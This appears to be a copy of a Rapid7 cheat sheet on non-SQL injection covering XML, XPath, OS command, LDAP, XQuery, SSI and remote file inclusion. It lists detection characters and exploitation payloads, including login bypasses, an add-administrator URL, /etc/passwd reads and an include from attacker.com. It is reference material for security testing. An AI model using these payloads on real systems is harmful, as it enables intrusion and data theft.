Injection Non-SQL Cheat Sheet

This document provides a cheat sheet on various injection techniques such as SQL, XML, LDAP, and OS Command Injection with information on detection and exploitation methods. Detection methods are listed for each type of injection including common characters and syntax to look for. Exploitation examples are also given demonstrating how to perform actions like bypassing logins, adding unauthorized users, and executing remote commands or accessing files.

INJECTION CHEAT SHEET (non-SQL)

www.rapid7.com

XML Injection

Detection

single quote
double quote
<> : angular parentheses
<!--/--> : XML Comment tag
& : ampersand
<![CDATA[ / ]]> : CDATA section delimiters

Exploitation

<!-- EXISTING TAG --> : New value of existing tag along with tag name
http://www.example.com/addUser.php?username=dan&password=123456<!--email: --><userid>0</userid><mail>[email protected] : Add user as administrator

XPATH Injection

Detection

single quote
double quote

Exploitation

or 1=1 or =
] | * | user[@role=admin
NODENAME : returns all children of node
//NODENAME : returns all elements in the document
NODENAME//SUBNODENAME : returns all SUBNODE under NODE element
//NODENAME/[NAME=VALUE] : returns all NODE that have a NAME child equal to VALUE
http://site.com/login.aspx?username=foo or 1=1 or = : Login bypass

OS Command Injection

Detection

| <ANOTHER COMMAND> : Pipe - On *NIX Output of first command to another, In Windows multiple commands execution
; <ANOTHER COMMAND> : semicolon - Running two commands together

Exploitation

%<ENV VARIABLE>% : Windows only
& : Running command in background (*NIX Only)
://site.com/whois.php?domain=foobar; echo+/etc/passwd : Displays content of /etc/passwd file

LDAP Injection

Detection

opening bracket
closing bracket
Pipe - OR operator for LDAP
& : Ampersand - AND operator for LDAP
Exclamation - NOT operator for LDAP

Exploitation

(&(param1=val1)(param2=val2)) : AND operator
(|(param1=val1)(param2=val2)) : OR operator
*)(ObjectClass=*)) (&(objectClass=void : Blind LDAP Injection using AND operator
void)(ObjectClass=void))(&(objectClass=void : BLIND LDAP Injection using OR operator
http://site.com/ldapsearch?user=* : Displays list of all users with attributes

XQuery Injection

Detection

single quote
double quote

Exploitation

or <ATTACK> or .=
something or =
http://site.com/xmlsearch?user=foo or = : Displays list of all users with attributes

Remote Code Injection

Upload File

Upload file : PHP, JSP, ASP etc.
Injecting active content : execution!
Access back from webroot

Remote file inclusion/injection

include($incfile); : PHP call
http://site.com/page.php?file=http://www.attacker.com/exploit : Injecting

SSI Injection

Detection

include, echo, exec : Look for word
.SHTML : File extension

Exploitation

< ! # = / . - > and [a-zA-Z0-9] : Required characters for successful execution
<!--#include virtual=<SOME SYSTEM FILE > -->
http://site.com/ssiform.php?showfile=<!-#include virtual=/etc/passwd --> : Displays content of /etc/passwd file
